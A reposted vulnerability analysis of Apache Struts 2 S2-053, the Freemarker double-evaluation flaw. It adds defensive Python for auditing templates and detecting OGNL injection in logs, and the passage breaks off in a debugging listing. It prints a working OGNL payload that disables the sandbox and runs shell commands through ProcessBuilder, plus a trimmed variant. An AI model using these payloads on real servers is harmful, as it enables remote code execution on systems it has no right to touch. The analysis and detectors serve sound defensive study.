Struts 2 S2-053 vulnerability analysis with PoC (exploit / early warning) - myhack58 (黑吧安全网)

Published: 2017-09-17 00:00:00
Author: 佚名 (Anonymous)
Source: www.myhack58.com (MYHACK58:62201789313)

CVSS3: 7 High (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: Local; Attack Complexity: High; Privileges Required: Low; User Interaction: None; Scope: Unchanged; Confidentiality / Integrity / Availability Impact: High

CVSS2: 6.9 Medium (AV:L/AC:M/Au:N/C:C/I:C/A:C)
  Access Vector: Local; Access Complexity: Medium; Authentication: None; Confidentiality / Integrity / Availability Impact: Complete

EPSS: 0.001 Low (percentile 37.4%)

(These scores are the hosting database's entry for CVE-2017-1000112, the identifier the article cites. They describe a locally exploitable issue and do not fit a remotely triggerable Struts code execution bug; treat them as a catalogue artefact, not as the severity of S2-053.)

Vulnerability overview

Vulnerability type: Remote code execution
CVE-ID: CVE-2017-12611 (the original article cites CVE-2017-1000112, which is a different issue; the Apache advisory for S2-053 assigns CVE-2017-12611)
Severity: High
Affected versions: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10

Vulnerability description

When a developer writes either of the following forms in a Freemarker template,

<@s.hidden name="redirectUri" value=redirectUri />
<@s.hidden name="redirectUri" value="${redirectUri}" />

Freemarker first resolves redirectUri, so the tag's value attribute becomes the raw string taken from the request. The Struts tag then evaluates that attribute as an expression a second time, and an attacker who controls the parameter gets code execution.
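The double evaluation described above, as an added example that is not part of the original article or of Apache Struts: a small audit script that walks a Freemarker template and reports every Struts tag attribute that is filled from a Freemarker expression (the two forms quoted in the advisory) rather than from a string literal. The sample template, the property name redirectUri and the tag names in it are constructed for the demonstration; the classification of a fixed "%{...}" expression as a single evaluation is the editor's reading of the tag behaviour, to be confirmed against the Struts version in use.

```python
"""Audit Freemarker templates for Struts tags whose attributes are filled from
Freemarker expressions rather than string literals (the S2-053 pattern).

Added example by the editor; it is not code from the original article or from
Apache Struts. The sample template below is constructed for the demonstration
and assumes the action exposes a request-supplied property named redirectUri.
"""
import re
from dataclasses import dataclass

# A Struts tag called from Freemarker, e.g. <@s.hidden name="x" value=... />
TAG_RE = re.compile(r"<@s\.(?P<tag>\w+)(?P<attrs>[^>]*?)/?>", re.S)
# attr=value with a double-quoted, single-quoted or bare (unquoted) value
ATTR_RE = re.compile(
    r"(?P<name>\w+)\s*=\s*(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)'|(?P<bare>[^\s/>]+))"
)


@dataclass(frozen=True)
class Finding:
    line: int
    tag: str
    attr: str
    value: str
    kind: str  # "bare-expression", "interpolation", "ognl-expression" or "literal"


def classify(quoted, bare):
    """Decide how the attribute value reaches the Struts tag.

    bare          -> Freemarker evaluates the expression; the tag receives the
                     variable's raw string (first advisory line).
    "${...}"      -> Freemarker interpolates into the string before the tag
                     sees it (second advisory line). Both hand the tag an
                     attacker-controlled string that it then evaluates again.
    "%{...}"      -> a fixed OGNL expression evaluated once by the tag itself
                     (editor's assumption about the safe form).
    anything else -> a plain string literal.
    """
    if bare is not None:
        return "bare-expression"
    if "${" in quoted:
        return "interpolation"
    if "%{" in quoted:
        return "ognl-expression"
    return "literal"


def scan(template):
    """Return one Finding per attribute of every <@s.*> tag in the template."""
    findings = []
    for tag in TAG_RE.finditer(template):
        line = template.count("\n", 0, tag.start()) + 1
        for attr in ATTR_RE.finditer(tag.group("attrs")):
            quoted = attr.group("dq") if attr.group("dq") is not None else attr.group("sq")
            bare = attr.group("bare")
            value = bare if bare is not None else quoted
            findings.append(Finding(line, tag.group("tag"), attr.group("name"),
                                    value, classify(quoted or "", bare)))
    return findings


def risky(findings):
    """Only the two Freemarker-evaluated forms let request data reach the tag's
    second evaluation; those are the attributes to rewrite."""
    return [f for f in findings if f.kind in ("bare-expression", "interpolation")]


# Constructed sample: lines 3 and 4 are the two forms quoted in the advisory.
SAMPLE_TEMPLATE = """\
<#-- constructed sample; redirectUri is assumed to come from the request -->
<@s.form action="login">
  <@s.hidden name="redirectUri" value=redirectUri />
  <@s.hidden name="redirectUri" value="${redirectUri}" />
  <@s.hidden name="redirectUri" value="%{redirectUri}" />
  <@s.hidden name="token" value="static-literal" />
  <@s.textfield name="username" />
</@s.form>
"""

if __name__ == "__main__":
    for f in risky(scan(SAMPLE_TEMPLATE)):
        print(f"line {f.line}: <@s.{f.tag} {f.attr}=...> is {f.kind}: {f.value}")
```

Run it over a checkout of your template directory by feeding each .ftl file's text to scan(); the two advisory forms come back as "bare-expression" and "interpolation", while plain literals and the tag's own fixed OGNL expression are left alone.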

PoC example (supplied as the value of the request parameter the template echoes, redirectUri above)

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/usr/bin/touch /tmp/vuln').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
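As an added example (editor's code, not the article's) for spotting the payload above in web server logs: it URL-decodes each request target, including double-encoded ones, strips the whitespace that OGNL ignores, and looks for the building blocks the PoC cannot do without (the expression delimiter, the memberAccess sandbox bypass, the excluded-package reset, and process spawning). The log lines, client addresses, paths and the shortened payload used to build them are constructed; the flagging threshold is the editor's choice.

```python
"""Flag HTTP requests carrying OGNL injection payloads of the kind shown in the
PoC above (S2-053 and the earlier S2-045 family share the same building blocks).

Added example by the editor; not code from the original article. The log lines
are constructed in Apache common log format; the client addresses, paths and
the trimmed payload are made up for the demonstration.
"""
import re
from dataclasses import dataclass
from urllib.parse import quote, unquote_plus

# Expression delimiters that make Struts evaluate a string as OGNL ...
DELIMITERS = ("%{", "${")
# ... and identifiers the PoC needs to disable the sandbox and spawn a process.
# A legitimate parameter value essentially never contains any of them.
MARKERS = (
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "getExcludedPackageNames",
    "getExcludedClasses",
    "setMemberAccess",
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
)

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


@dataclass(frozen=True)
class Hit:
    client: str
    target: str
    markers: tuple


def decode(value, rounds=3):
    """Undo URL encoding repeatedly so double-encoded payloads are seen in clear."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def ognl_markers(target):
    """Return the delimiters and identifiers present in a decoded request target.
    Whitespace is stripped first: OGNL ignores it, and the PoC is full of it."""
    text = re.sub(r"\s+", "", decode(target))
    return tuple(m for m in DELIMITERS + MARKERS if m in text)


def is_ognl_injection(target):
    """A delimiter plus any sandbox/process identifier, or two identifiers
    without a delimiter (a payload smuggled into an attribute that is already
    evaluated), is treated as an injection attempt."""
    found = ognl_markers(target)
    delims = [m for m in found if m in DELIMITERS]
    idents = [m for m in found if m not in DELIMITERS]
    return (bool(delims) and bool(idents)) or len(idents) >= 2


def scan_log(lines):
    """Return a Hit for every log line whose request target looks like OGNL injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if is_ognl_injection(target):
            hits.append(Hit(m.group("client"), target, ognl_markers(target)))
    return hits


# A trimmed, constructed variant of the PoC, used only to build the sample log lines.
_PAYLOAD = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
            "(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))."
            "(#p=new java.lang.ProcessBuilder({'id'})).(#p.start())}")

SAMPLE_LOG = [
    # benign: redirectUri is an ordinary path
    '10.0.0.5 - - [17/Sep/2017:10:01:02 +0000] "GET /app/login.action?redirectUri=%2Fhome HTTP/1.1" 200 512',
    # attack: payload URL-encoded once
    '10.0.0.9 - - [17/Sep/2017:10:01:07 +0000] "GET /app/login.action?redirectUri='
    + quote(_PAYLOAD, safe="") + ' HTTP/1.1" 200 77',
    # attack: same payload URL-encoded twice to slip past a naive filter
    '10.0.0.9 - - [17/Sep/2017:10:01:09 +0000] "GET /app/login.action?redirectUri='
    + quote(quote(_PAYLOAD, safe=""), safe="") + ' HTTP/1.1" 200 77',
    # benign: a literal percent sign that decodes to "10%"
    '10.0.0.7 - - [17/Sep/2017:10:02:00 +0000] "GET /app/prices.action?discount=10%25 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit.client, hit.target[:60] + "...", hit.markers)
```

The access log only shows GET query strings; the same is_ognl_injection() check applied to POST bodies or to a WAF's captured parameters covers the PoC when it is sent in a form field, which is how the redirectUri case in the template above would normally be reached.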
PoC debugging

After a quick read of the PoC, and following the usual practice, set a breakpoint in the start() method of the ProcessBuilder class:

// java.lang.ProcessBuilder
public Process start() throws IOException {
    // Must convert to array first -- a malicious user-supplied
    // list might try to circumvent the security check.
    String[] cmdarray = command.toArray(new String[command.size()]);
    cmdarray = cmdarray.clone();
    for (String arg : cmdarray)
        if (arg == null)
            throw new NullPointerException();
    // Throws IndexOutOfBoundsException if command is empty
    String prog = cmdarray[0];

    SecurityManager security = System.getSecurityManager();
    if (security != null)
        security.checkExec(prog);

    String dir = directory == null ? null : directory.toString();

    for (int i = 1; i < cmdarray.length; i++) {
        if (cmdarray[i].indexOf('\u0000') >= 0) {
            throw new IOException("invalid null character in command");
        }
    }

    try {
        return ProcessImpl.start(cmdarray,
                                 environment,
                                 dir,
                                 redirects,
                                 redirectErrorStream);
    } catch (IOException | IllegalArgumentException e) {
        String exceptionInfo = ": " + e.getMessage();
        Throwable cause = e;
        if ((e instanceof IOException) && security != null) {
            // Can not disclose the fail reason for read-protected files.
            try {
                security.checkRead(prog);
                // ... (the excerpt ends here; the remainder of the method and of
                // the analysis is on the following pages of the original article)

